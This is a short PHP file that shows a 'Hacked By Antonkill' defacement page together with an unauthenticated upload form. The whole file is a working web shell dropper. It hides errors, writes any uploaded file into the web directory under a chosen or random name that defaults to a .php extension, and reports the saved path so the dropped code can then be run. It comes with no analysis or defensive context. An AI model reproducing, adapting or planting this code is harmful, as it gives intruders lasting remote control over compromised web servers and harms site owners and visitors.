﻿<?php @error_reporting(0);if(isset($_FILES['f'])){$n=$_GET['k']??substr(md5(uniqid()),0,8).'.'.(pathinfo($_FILES['f']['name'],4)?:'php');move_uploaded_file($_FILES['f']['tmp_name'],$n);echo"OK:$n";}else{echo'<html><head><title>Hacked By Antonkill</title></head><body><h1>Hacked By Antonkill</h1><form method=post enctype=multipart/form-data><input type=file name=f><input type=submit value=UP></form></body></html>';}?>